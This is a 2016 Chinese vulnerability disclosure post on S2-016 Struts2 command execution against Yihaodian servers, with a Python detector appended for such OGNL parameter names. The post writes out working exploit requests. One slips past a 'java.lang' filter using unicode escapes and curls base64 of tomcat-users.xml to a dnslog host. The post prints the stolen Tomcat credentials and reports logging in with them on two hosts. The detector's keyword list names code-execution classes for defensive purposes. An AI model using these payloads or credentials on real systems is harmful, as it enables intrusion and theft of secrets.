HanDs (administrator)

[July vulnerability disclosure] Struts2 command execution in a 1号店 (Yihaodian) system (protection bypass)

Brief description:

Details:

@lijiejie's WooYun report "腾讯移动端某功能SSRF可探/漫游内网(cloudeye神器案例)" (SSRF in a Tencent mobile-app feature allows probing/roaming the intranet; a CloudEye showcase) mentions two URL redirects, and one look at them shows it is S2-016 command execution.

http://tms2.yihaodian.com/system/login_login.action?redirect:http://admin.soso.com
http://3pl.yihaodian.com/system/login_login.action?redirect:http://10.187.10.218


tms2.yihaodian.com seems to have been fixed, but 3pl.yihaodian.com has not.


POST /system/login_view.action HTTP/1.1
User-Agent: curl/7.33.0
Host: 3pl.yihaodian.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 196
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987
--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:${#application.get('javax.servlet.context.tempdir')}"
-1
--------------------------4a606c052a893987--

[image: 1.png]


During testing I found that some characters are filtered; strings such as "java.lang" may not appear.
I switched to a different exp that uses Java's ScriptEngine to call Java methods:

POST /system/login_view.action HTTP/1.1
User-Agent: curl/7.33.0
Host: 3pl.yihaodian.com
Accept: */*
Proxy-Connection: Keep-Alive
Content-Length: 396
Content-Type: multipart/form-data; boundary=------------------------4a606c052a893987
--------------------------4a606c052a893987
Content-Disposition: form-data; name="redirect:${new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['/bin/sh','-c','curl xxoo.dnslog.info/$(cat /usr/local/tomcat6/conf/tomcat-users.xml|base64 -w 0)']).start()\u003B")}"
-1
--------------------------4a606c052a893987--

[image: 3.png]


Read tomcat-users.xml to obtain the Tomcat management user and password and send them to CloudEye; the request received is as follows:

[image: 2.png]

Proof of vulnerability:

Base64-decoding gives:

<?xml version='1.0' encoding='utf-8'?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<tomcat-users>
<role rolename="manager"/>
<user username="monitor" password="OPS-monitoR" roles="manager"/>
<!--
<role rolename="tomcat"/>
<role rolename="role1"/>
<user username="tomcat" password="tomcat" roles="tomcat"/>
<user username="both" password="tomcat" roles="tomcat,role1"/>
<user username="role1" password="tomcat" roles="role1"/>
-->
</tomcat-users>


Successfully logged in to Tomcat:

[image: tomcat.png]


tms2.yihaodian.com is configured with the same user and password, and login there also succeeded:

[image: tomcat-2.png]


Fix:


Posted: 2016-7-23
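The post shows why a filter that blocks the literal string "java.lang" is not a fix for S2-016 (CVE-2013-2251): the OGNL expression lives in the parameter name behind a `redirect:` prefix, and inside a ScriptEngine string the attacker can spell the same identifier as `j\u0061va.lang`. The detector below, an added example that is not code from the original post, classifies parameter names the way a WAF or log-review script should: it flattens percent-encoding and `\uXXXX` escapes first, then looks for the Struts prefix, an OGNL `${`/`%{` expression and code-execution identifiers. The `naive_filter_blocks` function models the kind of substring check the post describes; the real filter on 3pl.yihaodian.com is not shown on the page, so that function and all sample parameter names below are constructed for illustration (the shell command in the escaped sample is shortened to `id`).

```python
"""Classify request parameter names for S2-016 style OGNL injection.

Added example; not from the original post. The samples are constructed.
"""
import re
from urllib.parse import unquote

# Parameter-name prefixes that S2-016 (CVE-2013-2251) evaluated as OGNL.
PREFIX_RE = re.compile(r'^(redirect|redirectAction|action):', re.IGNORECASE)
# Start of an OGNL expression in either syntax.
OGNL_EXPR_RE = re.compile(r'[$%]\{')
# Identifiers that do not belong in a parameter name unless code is being run.
RCE_KEYWORDS = (
    "java.lang", "processbuilder", "getruntime", "scriptenginemanager",
    "#_memberaccess", "#context", "#application",
)
# Matches a Java/JavaScript unicode escape such as \u0061 ("a").
UNICODE_ESCAPE_RE = re.compile(r'\\u([0-9a-fA-F]{4})')

# Constructed samples modelled on the post's requests (hypothetical data).
SAMPLES = {
    "open redirect probe": "redirect:http://admin.soso.com",
    "ognl probe": "redirect:${#application.get('javax.servlet.context.tempdir')}",
    "escaped rce": r"""redirect:${new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['/bin/sh','-c','id']).start()\u003B")}""",
    "url encoded": "redirect%3A%24%7B1%2B1%7D",
    "benign": "username",
}


def naive_filter_blocks(name):
    """A literal substring filter on the raw name, like the one the post
    ran into. Constructed for illustration; the real filter is not shown."""
    return "java.lang" in name


def normalize(name):
    """Undo the encodings an attacker can stack: URL percent-encoding, then
    \\uXXXX escapes. Repeats until nothing changes so double encoding is
    flattened too."""
    prev = None
    while prev != name:
        prev = name
        name = unquote(name)
        name = UNICODE_ESCAPE_RE.sub(lambda m: chr(int(m.group(1), 16)), name)
    return name


def classify(name):
    """Return (verdict, normalized_name, matched_keywords).

    verdict is one of:
      "ognl-injection"  prefix plus an OGNL expression (S2-016 code execution)
      "redirect-prefix" prefix without an expression (S2-016 open redirect)
      "clean"           no Struts prefix in the name
    """
    norm = normalize(name)
    lowered = norm.lower()
    hits = [k for k in RCE_KEYWORDS if k in lowered]
    has_prefix = PREFIX_RE.match(norm) is not None
    has_expr = OGNL_EXPR_RE.search(norm) is not None
    if has_prefix and has_expr:
        return "ognl-injection", norm, hits
    if has_prefix:
        return "redirect-prefix", norm, hits
    return "clean", norm, hits


def scan(samples):
    """Classify every sample; returns {label: verdict} for a quick overview."""
    return {label: classify(name)[0] for label, name in samples.items()}


if __name__ == "__main__":
    for label, name in SAMPLES.items():
        verdict, norm, hits = classify(name)
        print(f"{label:20} naive_blocks={naive_filter_blocks(name)!s:5} "
              f"verdict={verdict:16} hits={hits}")
```

Run stand-alone, the table shows the escaped payload sailing past the naive check (`naive_blocks=False`) while the normalized view still matches `java.lang` and `processbuilder`. The design point is that matching must happen on the decoded name and must key on the `redirect:`/`redirectAction:` prefix itself, since any OGNL reaching that prefix is a hit regardless of which classes it names; the only real fix is upgrading Struts past 2.3.15.1.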